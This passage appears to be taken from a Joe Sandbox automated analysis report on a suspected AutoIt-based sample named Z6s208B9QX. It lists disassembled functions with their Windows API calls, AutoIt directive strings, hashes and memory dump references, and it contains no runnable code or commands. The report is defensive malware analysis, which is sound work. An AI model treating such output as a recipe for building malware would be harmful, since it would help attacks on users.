                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __wcsnicmp
                                                                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                        • API String ID: 1038674560-2734436370
                                                                                                        • Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                                                                        • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                                                                        • Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                                                                        • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                                                                        Function 00434034 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
                                                                                                        • LoadStringW.USER32(00000000), ref: 00434060
                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                                                                        • LoadStringW.USER32(00000000), ref: 00434078
                                                                                                        • _wprintf.LIBCMT ref: 004340A1
                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                                                                        Strings
                                                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                                                        • API String ID: 3648134473-3128320259
                                                                                                        • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                                                        • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                                                                        • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                                                        • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                                                                        Function 0041793C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                                                                        • __lock.LIBCMT ref: 00417981
                                                                                                          • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                                                                          • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                                                                          • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                                                        • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                                                                        • __lock.LIBCMT ref: 004179A2
                                                                                                        • ___addlocaleref.LIBCMT ref: 004179C0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                        • String ID: KERNEL32.DLL$pI
                                                                                                        • API String ID: 637971194-197072765
                                                                                                        • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                                        • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                                                                        • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                                        • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                                                                        Function 0046822A Relevance: 12.3, APIs: 8, Instructions: 267COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memmove$_malloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 1938898002-0
                                                                                                        • Opcode ID: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                                                                        • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                                                                        • Opcode Fuzzy Hash: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                                                                        • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                                                                        Function 0044B489 Relevance: 12.1, APIs: 8, Instructions: 102fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                        • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                                                                        • _memmove.LIBCMT ref: 0044B555
                                                                                                        • _memmove.LIBCMT ref: 0044B578
                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                                                                        • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 2737351978-0
                                                                                                        • Opcode ID: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                                                                        • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                                                                        • Opcode Fuzzy Hash: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                                                                        • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                                                                        Function 00415214 Relevance: 12.1, APIs: 8, Instructions: 66threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                                                                        • __calloc_crt.LIBCMT ref: 00415246
                                                                                                        • __getptd.LIBCMT ref: 00415253
                                                                                                        • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                                                                        • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                                                                        • _free.LIBCMT ref: 0041529E
                                                                                                        • __dosmaperr.LIBCMT ref: 004152A9
                                                                                                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 3638380555-0
                                                                                                        • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                                                        • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                                                                        • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                                                        • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                                                                        Function 0046C84C Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 308COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                                                                          • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                                          • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Variant$Copy$ClearErrorInitLast
                                                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                        • API String ID: 3207048006-625585964
                                                                                                        • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                                        • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                                                                        • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                                        • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                                                                        Function 00465489 Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                                                                          • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                                        • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                                                                        • gethostbyname.WSOCK32(?), ref: 004655A6
                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                                                                        • _memmove.LIBCMT ref: 004656CA
                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                                                                        • WSACleanup.WSOCK32 ref: 00465762
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                                                                        • String ID:
                                                                                                        • API String ID: 2945290962-0
                                                                                                        • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                                        • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                                                                        • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                                        • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                                                                        Function 004404E8 Relevance: 10.8, APIs: 7, Instructions: 271windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                                                                        • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                                                                        • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                                                                        • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                                                                        • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 1457242333-0
                                                                                                        • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                                        • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                                                                        • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                                        • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                                                                        Function 0046B6AB Relevance: 10.8, APIs: 7, Instructions: 258registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ConnectRegistry_memmove_wcslen
                                                                                                        • String ID:
                                                                                                        • API String ID: 15295421-0
                                                                                                        • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                                        • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                                                                        • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                                        • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                                                                        Function 00467511 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 213COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                        • _wcstok.LIBCMT ref: 004675B2
                                                                                                          • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                                                        • _wcscpy.LIBCMT ref: 00467641
                                                                                                        • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                                        • _wcslen.LIBCMT ref: 00467793
                                                                                                        • _wcslen.LIBCMT ref: 004677BD
                                                                                                          • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                                                                        • String ID: X
                                                                                                        • API String ID: 780548581-3081909835
                                                                                                        • Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                                                                        • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                                                                        • Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                                                                        • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                                                                        Function 0044734F Relevance: 10.7, APIs: 7, Instructions: 210COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                          • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                          • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                        • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                                                                        • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                                                                        • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                                                                        • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                                                                        • CloseFigure.GDI32(?), ref: 0044751F
                                                                                                        • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                                                                        • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                        • String ID:
                                                                                                        • API String ID: 4082120231-0
                                                                                                        • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                                        • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                                                                        • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                                        • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                                                                        Function 0046B280 Relevance: 10.7, APIs: 7, Instructions: 196registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
